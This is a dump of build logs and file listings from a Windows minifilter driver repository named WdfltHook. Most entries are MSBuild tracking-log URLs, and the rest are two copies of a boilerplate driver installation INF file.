/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.2880.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.2880.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.4016.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.4016.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.4016.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.4016.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.4332.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.4332.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.4332.write.1.tlog: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.4332.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.4344.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.4344.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.4344.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.4344.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.5868.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.5868.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.5868.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.5868.write.1.tlog -------------------------------------------------------------------------------- 
/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.5884.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.5884.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.5884.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.5884.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.6024.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.6024.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.6024.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.6024.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.7112.read.1.tlog: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.7112.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.7112.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.7112.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.8152.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.8152.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.8152.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.8152.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.8376.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.8376.read.1.tlog -------------------------------------------------------------------------------- 
/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.8376.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.8376.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.8756.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.8756.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.8756.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.8756.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9316.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9316.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9316.write.1.tlog: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9316.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9328.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9328.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9328.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9328.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9368.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9368.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9368.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9368.write.1.tlog -------------------------------------------------------------------------------- 
/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9388.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9388.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9388.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9388.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9552.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9552.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9552.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9552.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9576.read.1.tlog: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9576.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9576.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9576.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9608.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9608.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9608.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9608.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9632.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9632.read.1.tlog -------------------------------------------------------------------------------- 
/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9632.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9632.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9636.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9636.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9636.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9636.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9752.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9752.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9752.write.1.tlog: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9752.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/link.command.1.tlog: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/rc.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/rc.command.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/rc.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/rc.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/rc.write.1.tlog: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/rc.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/signtool.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/signtool.command.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/signtool.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/signtool.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/signtool.timestamp.1.tlog: -------------------------------------------------------------------------------- 1 | C:\USERS\DORGE\SOURCE\REPOS\WDFLTHOOK\X64\RELEASE\WDFLTHOOK.SYS|638343802137431690 2 | C:\USERS\DORGE\SOURCE\REPOS\WDFLTHOOK\X64\RELEASE\WDFLTHOOK\WDFLTHOOK.CAT|638343802161681781 3 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/signtool.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/signtool.write.1.tlog -------------------------------------------------------------------------------- 
/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/stampinf.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/stampinf.command.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/stampinf.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/stampinf.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/stampinf.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/stampinf.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/vc142.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/vc142.pdb -------------------------------------------------------------------------------- /WdfltHook/x64/Release/WdfltHook.cer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/x64/Release/WdfltHook.cer -------------------------------------------------------------------------------- /WdfltHook/x64/Release/WdfltHook.inf: 
-------------------------------------------------------------------------------- 1 | ;;; 2 | ;;; WdfltHook 3 | ;;; 4 | 5 | [Version] 6 | Signature = "$Windows NT$" 7 | ; TODO - Change the Class and ClassGuid to match the Load Order Group value, see https://msdn.microsoft.com/en-us/windows/hardware/gg462963 8 | ; Class = "ActivityMonitor" ;This is determined by the work this filter driver does 9 | ; ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} ;This value is determined by the Load Order Group value 10 | Class = "ActivityMonitor" 11 | ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} 12 | Provider = "Template" 13 | DriverVer = 10/31/2023,22.16.51.732 14 | CatalogFile = WdfltHook.cat 15 | PnpLockDown=1 16 | 17 | [DestinationDirs] 18 | DefaultDestDir = 12 19 | MiniFilter.DriverFiles = 12 ;%windir%\system32\drivers 20 | 21 | ;; 22 | ;; Default install sections 23 | ;; 24 | 25 | [DefaultInstall] 26 | OptionDesc = %ServiceDescription% 27 | CopyFiles = MiniFilter.DriverFiles 28 | 29 | [DefaultInstall.Services] 30 | AddService = %ServiceName%,,MiniFilter.Service 31 | 32 | ;; 33 | ;; Default uninstall sections 34 | ;; 35 | 36 | [DefaultUninstall] 37 | DelFiles = MiniFilter.DriverFiles 38 | 39 | [DefaultUninstall.Services] 40 | DelService = %ServiceName%,0x200 ;Ensure service is stopped before deleting 41 | 42 | ; 43 | ; Services Section 44 | ; 45 | 46 | [MiniFilter.Service] 47 | DisplayName = %ServiceName% 48 | Description = %ServiceDescription% 49 | ServiceBinary = %12%\%DriverName%.sys ;%windir%\system32\drivers\ 50 | Dependencies = "FltMgr" 51 | ServiceType = 2 ;SERVICE_FILE_SYSTEM_DRIVER 52 | StartType = 3 ;SERVICE_DEMAND_START 53 | ErrorControl = 1 ;SERVICE_ERROR_NORMAL 54 | ; TODO - Change the Load Order Group value 55 | ; LoadOrderGroup = "FSFilter Activity Monitor" 56 | LoadOrderGroup = "FSFilter Activity Monitor" 57 | AddReg = MiniFilter.AddRegistry 58 | 59 | ; 60 | ; Registry Modifications 61 | ; 62 | 63 | [MiniFilter.AddRegistry] 64 | 
HKR,,"DebugFlags",0x00010001 ,0x0 65 | HKR,,"SupportedFeatures",0x00010001,0x3 66 | HKR,"Instances","DefaultInstance",0x00000000,%DefaultInstance% 67 | HKR,"Instances\"%Instance1.Name%,"Altitude",0x00000000,%Instance1.Altitude% 68 | HKR,"Instances\"%Instance1.Name%,"Flags",0x00010001,%Instance1.Flags% 69 | 70 | ; 71 | ; Copy Files 72 | ; 73 | 74 | [MiniFilter.DriverFiles] 75 | %DriverName%.sys 76 | 77 | [SourceDisksFiles] 78 | WdfltHook.sys = 1,, 79 | 80 | [SourceDisksNames] 81 | 1 = %DiskId1%,,, 82 | 83 | ;; 84 | ;; String Section 85 | ;; 86 | 87 | [Strings] 88 | ServiceDescription = "WdfltHook Mini-Filter Driver" 89 | ServiceName = "WdfltHook" 90 | DriverName = "WdfltHook" 91 | DiskId1 = "WdfltHook Device Installation Disk" 92 | 93 | ;Instance-specific information. 94 | DefaultInstance = "WdfltHook Instance" 95 | Instance1.Name = "WdfltHook Instance" 96 | ; TODO - Change the altitude value, see https://msdn.microsoft.com/en-us/windows/hardware/drivers/ifs/load-order-groups-and-altitudes-for-minifilter-drivers 97 | Instance1.Altitude = "370030" 98 | Instance1.Flags = 0x0 ; Allow all attachments (no attachment restrictions) 99 | -------------------------------------------------------------------------------- /WdfltHook/x64/Release/WdfltHook.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/x64/Release/WdfltHook.pdb -------------------------------------------------------------------------------- /WdfltHook/x64/Release/WdfltHook.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/x64/Release/WdfltHook.sys -------------------------------------------------------------------------------- /WdfltHook/x64/Release/WdfltHook/WdfltHook.inf: 
-------------------------------------------------------------------------------- 1 | ;;; 2 | ;;; WdfltHook 3 | ;;; 4 | 5 | [Version] 6 | Signature = "$Windows NT$" 7 | ; TODO - Change the Class and ClassGuid to match the Load Order Group value, see https://msdn.microsoft.com/en-us/windows/hardware/gg462963 8 | ; Class = "ActivityMonitor" ;This is determined by the work this filter driver does 9 | ; ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} ;This value is determined by the Load Order Group value 10 | Class = "ActivityMonitor" 11 | ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} 12 | Provider = "Template" 13 | DriverVer = 10/31/2023,22.16.51.732 14 | CatalogFile = WdfltHook.cat 15 | PnpLockDown=1 16 | 17 | [DestinationDirs] 18 | DefaultDestDir = 12 19 | MiniFilter.DriverFiles = 12 ;%windir%\system32\drivers 20 | 21 | ;; 22 | ;; Default install sections 23 | ;; 24 | 25 | [DefaultInstall] 26 | OptionDesc = %ServiceDescription% 27 | CopyFiles = MiniFilter.DriverFiles 28 | 29 | [DefaultInstall.Services] 30 | AddService = %ServiceName%,,MiniFilter.Service 31 | 32 | ;; 33 | ;; Default uninstall sections 34 | ;; 35 | 36 | [DefaultUninstall] 37 | DelFiles = MiniFilter.DriverFiles 38 | 39 | [DefaultUninstall.Services] 40 | DelService = %ServiceName%,0x200 ;Ensure service is stopped before deleting 41 | 42 | ; 43 | ; Services Section 44 | ; 45 | 46 | [MiniFilter.Service] 47 | DisplayName = %ServiceName% 48 | Description = %ServiceDescription% 49 | ServiceBinary = %12%\%DriverName%.sys ;%windir%\system32\drivers\ 50 | Dependencies = "FltMgr" 51 | ServiceType = 2 ;SERVICE_FILE_SYSTEM_DRIVER 52 | StartType = 3 ;SERVICE_DEMAND_START 53 | ErrorControl = 1 ;SERVICE_ERROR_NORMAL 54 | ; TODO - Change the Load Order Group value 55 | ; LoadOrderGroup = "FSFilter Activity Monitor" 56 | LoadOrderGroup = "FSFilter Activity Monitor" 57 | AddReg = MiniFilter.AddRegistry 58 | 59 | ; 60 | ; Registry Modifications 61 | ; 62 | 63 | [MiniFilter.AddRegistry] 64 | 
HKR,,"DebugFlags",0x00010001 ,0x0 65 | HKR,,"SupportedFeatures",0x00010001,0x3 66 | HKR,"Instances","DefaultInstance",0x00000000,%DefaultInstance% 67 | HKR,"Instances\"%Instance1.Name%,"Altitude",0x00000000,%Instance1.Altitude% 68 | HKR,"Instances\"%Instance1.Name%,"Flags",0x00010001,%Instance1.Flags% 69 | 70 | ; 71 | ; Copy Files 72 | ; 73 | 74 | [MiniFilter.DriverFiles] 75 | %DriverName%.sys 76 | 77 | [SourceDisksFiles] 78 | WdfltHook.sys = 1,, 79 | 80 | [SourceDisksNames] 81 | 1 = %DiskId1%,,, 82 | 83 | ;; 84 | ;; String Section 85 | ;; 86 | 87 | [Strings] 88 | ServiceDescription = "WdfltHook Mini-Filter Driver" 89 | ServiceName = "WdfltHook" 90 | DriverName = "WdfltHook" 91 | DiskId1 = "WdfltHook Device Installation Disk" 92 | 93 | ;Instance-specific information. 94 | DefaultInstance = "WdfltHook Instance" 95 | Instance1.Name = "WdfltHook Instance" 96 | ; TODO - Change the altitude value, see https://msdn.microsoft.com/en-us/windows/hardware/drivers/ifs/load-order-groups-and-altitudes-for-minifilter-drivers 97 | Instance1.Altitude = "370030" 